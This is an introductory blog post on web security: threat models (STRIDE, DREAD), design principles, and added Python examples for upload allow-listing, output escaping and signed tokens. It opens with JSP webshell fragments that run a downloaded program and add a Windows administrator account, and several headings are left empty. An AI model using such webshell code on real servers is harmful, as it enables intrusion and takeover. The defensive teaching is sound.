Talk In Web Security (Security Worldview): Developing a Secure Website

Writer: BYSocket (泥沙砖瓦浆木匠)

Reprint it anywhere you want.

Why write about Web Security?

A single Java file can compromise your server. One JSP can download any file. How is this done?
  1. Write a JSP and upload it to the server.
  2. Use the JSP to download any malicious program (the "bug") with HttpClient.
  3. Run the program and read or add administrator accounts or data.
We can see some of it from what I wrote. It's easy but useful:

    // Fragment of the uploaded JSP: on a non-Windows host the downloaded file is
    // made executable with chmod 777, then run through Runtime.exec().
    if (!IsWindows())
    {
        Process process = Runtime.getRuntime().exec("chmod 777 " + strExeFile);

        if (process.waitFor() != 0)
            out.println("FAIL ---> when open file");
    }

    Process process = Runtime.getRuntime().exec(strExeFile);

    if (process.waitFor() == 0)
        out.println("SUCCESS ---> When open the file");

This is how Java runs the downloaded program. The next step is to obtain an administrator user.

    // Fragment: on Windows the JSP creates a local user with "net user ... /add"
    // and, if that succeeds, puts it in the local administrators group.
    if (IsWindows())
    {
        String execStr = "cmd.exe /C " + "net user " + strAcc + " " + strPwd + " /add";
        Process process = Runtime.getRuntime().exec(execStr);

        if (process.waitFor() == 0)
        {
            Runtime.getRuntime().exec("cmd.exe /C " + "net localgroup administrators " + strAcc + " /add");
        }
        else
            out.print("FAIL ---> when " + execStr);
    }

That is how Java is used to add an administrator user.

Attacks like these can be seen everywhere, so we need to learn web security. First, we can learn from the history of the Web.

Some web security basics you need to know

As the environment gets worse and haze spreads, many people wear masks when going out. The mask protects us only because we trust it, and web security is the same.

Note: 'Web security is based on trust; every web security design is also based on trust.'

Many web attacks are like the haze:
  1. XSS
  2. CRLF Injection
  3. XPath Injection
  4. HTML Injection
  5. JavaScript Injection

XSS Development

So there is a question: 'How do we analyse the web security of a piece of software or a project?'

STRIDE and DREAD, from Microsoft

STRIDE

STRIDE is a system developed by Microsoft for thinking about computer security threats. The threat categories are:
  1. Spoofing of user identity
  2. Tampering
  3. Repudiation
  4. Information disclosure
  5. Denial of service
  6. Elevation of privilege

DREAD

The problem with a simplistic rating system is that team members usually will not agree on ratings. To help solve this, add new dimensions that help determine what the impact of a security threat really means. At Microsoft, the DREAD model is used to help calculate risk. By using the DREAD model, you arrive at the risk rating for a given threat by asking the following questions:

  1. Damage potential: How great is the damage if the vulnerability is exploited?

  2. Reproducibility: How easy is it to reproduce the attack?

  3. Exploitability: How easy is it to launch an attack?

  4. Affected users: As a rough percentage, how many users are affected?

  5. Discoverability: How easy is it to find the vulnerability?

With these categories in mind, a good web security design has the following features:
  1. Solves the problem effectively
  2. Good experience for users
  3. Low coupling
  4. Easy to extend and upgrade

How to Develop a Secure Website

Note: 'Security is a plain subject and an art of balance.'

1. Secure By Default

This is also about the security of users. We can create a white list and a black list and limit what users may do.
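As an added example (not the author's code), the difference between the page's black list and white list applied to the JSP-upload story above: a deny-list of extensions misses simple name variants, while an allow-list of the types the feature actually needs, checked against the file's leading bytes, rejects the JSP whatever it is called. The file names and bytes are constructed samples.

```python
import os
import secrets

# Deny-list approach ("The Black List"): enumerate what is forbidden.
BLACKLIST = {".jsp", ".php", ".exe"}

# Allow-list approach ("The White List"): enumerate what the upload feature
# needs, together with the leading bytes each type must start with.
WHITELIST = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".pdf": b"%PDF-",
}


def blacklist_allows(filename):
    """Deny-list check as it is often written: look only at the final extension."""
    return os.path.splitext(filename)[1] not in BLACKLIST


def whitelist_allows(filename, content):
    """Allow-list check: the extension must be expected AND the bytes must match it."""
    ext = os.path.splitext(filename)[1].lower()
    magic = WHITELIST.get(ext)
    return magic is not None and content.startswith(magic)


def stored_name(filename):
    """Never reuse the client's name on disk: keep only the vetted extension, so an
    upload cannot pick its own name or path under the web root."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in WHITELIST:
        raise ValueError("extension not allowed: " + ext)
    return secrets.token_hex(16) + ext


# Constructed samples: the start of a JSP page, and a real PNG signature.
JSP_BODY = b"<%@ page import=\"java.io.*\" %>"
PNG_BODY = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8


def demo():
    """Same JSP under different names: the deny-list only catches the exact spelling."""
    return {
        "blacklist_lower": blacklist_allows("shell.jsp"),               # False: caught
        "blacklist_upper": blacklist_allows("shell.JSP"),               # True: missed
        "blacklist_variant": blacklist_allows("shell.jspx"),            # True: missed
        "whitelist_upper": whitelist_allows("shell.JSP", JSP_BODY),     # False
        "whitelist_renamed": whitelist_allows("photo.png", JSP_BODY),   # False: bytes checked
        "whitelist_real_png": whitelist_allows("photo.PNG", PNG_BODY),  # True
    }
```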

2. Defense in Depth

Defense in Depth is a crucial model for implementing effective information security. The details of such a diverse model are what make it successful; I have put together a series of eight webcasts on this topic. Here are the 7 levels:

3. Separation of Data and Code
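The page names this principle without an illustration; here is an added one (not the author's code) covering the XSS, HTML injection and JavaScript injection listed earlier: the same untrusted string concatenated straight into markup, versus kept as data by escaping it for the HTML context and JSON-encoding it for the script context. The input is constructed.

```python
import html
import json

# Constructed untrusted input: it tries to inject a tag into the HTML context
# and to break out of the string literal in the script context.
USER_INPUT = '<img src=x onerror=alert(1)>"</script><script>alert(2)</script>'


def render_unsafe(name):
    """Data concatenated straight into code: the pattern behind XSS, HTML and JS injection."""
    return ('<p>Hello ' + name + '</p>\n'
            '<script>var user = "' + name + '";</script>')


def js_literal(value):
    """Encode data as a JavaScript string literal. JSON gives valid JS syntax;
    escaping '<' keeps an embedded '</script>' from closing the script block."""
    return json.dumps(value).replace('<', '\\u003c')


def render_safe(name):
    """Data kept as data: escaped per context, so the template's code is unchanged."""
    return ('<p>Hello ' + html.escape(name, quote=True) + '</p>\n'
            '<script>var user = ' + js_literal(name) + ';</script>')


def count_script_blocks(page):
    """How many <script> openings the browser would see; the template has exactly one."""
    return page.count('<script')


def decoded_js_value(page):
    """Recover the value the script block assigns; with data kept as data it survives intact,
    with concatenation the literal is no longer parseable and None is returned."""
    start = page.index('var user = ') + len('var user = ')
    end = page.index(';</script>', start)
    try:
        return json.loads(page[start:end])
    except ValueError:
        return None
```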

4. Unpredictability

Parameters may be easy to guess, so make them hard to guess.
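As an added example (not the author's code) of making a parameter hard to guess: a sequential record id stays readable but is bound to an expiry and an HMAC tag that only the server key can produce, so incrementing the id or forging a tag fails verification. The key is generated per process for the demo; a real deployment would load it from protected configuration.

```python
import base64
import hashlib
import hmac
import secrets
import time

# Demo key generated per process (assumption: production loads it from protected config).
SECRET_KEY = secrets.token_bytes(32)


def _tag(message):
    """HMAC-SHA256 over the message, base64url without padding."""
    digest = hmac.new(SECRET_KEY, message, hashlib.sha256).digest()
    return base64.urlsafe_b64encode(digest).rstrip(b"=").decode()


def make_token(record_id, ttl=600, now=None):
    """Turn a guessable parameter (a sequential record id) into one that cannot be
    forged: 'id.expiry.tag', where the tag requires the server key."""
    expiry = int(time.time() if now is None else now) + ttl
    message = "%d.%d" % (record_id, expiry)
    return message + "." + _tag(message.encode())


def parse_token(token, now=None):
    """Return the record id if the tag verifies and the token is unexpired, else None."""
    parts = token.rsplit(".", 2)
    if len(parts) != 3 or not parts[0].isdigit() or not parts[1].isdigit():
        return None
    record_id, expiry, tag = parts
    expected = _tag((record_id + "." + expiry).encode())
    # Constant-time comparison: a plain == would leak the tag byte by byte via timing.
    if not hmac.compare_digest(tag.encode(), expected.encode()):
        return None
    if int(time.time() if now is None else now) > int(expiry):
        return None
    return int(record_id)


def tampered_copy(token):
    """Constructed failure case: the neighbour id a guesser would try against '?id=123'."""
    record_id, rest = token.split(".", 1)
    return "%d.%s" % (int(record_id) + 1, rest)
```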

Think in Web Security

Like a bucket of water: we trust both the bucket and the water, and that trust is the security. When poison gets into the bucket, the security is broken.
Note: 'Open, Free, Share'

Good night~


Date: 2024-10-13 17:03:37
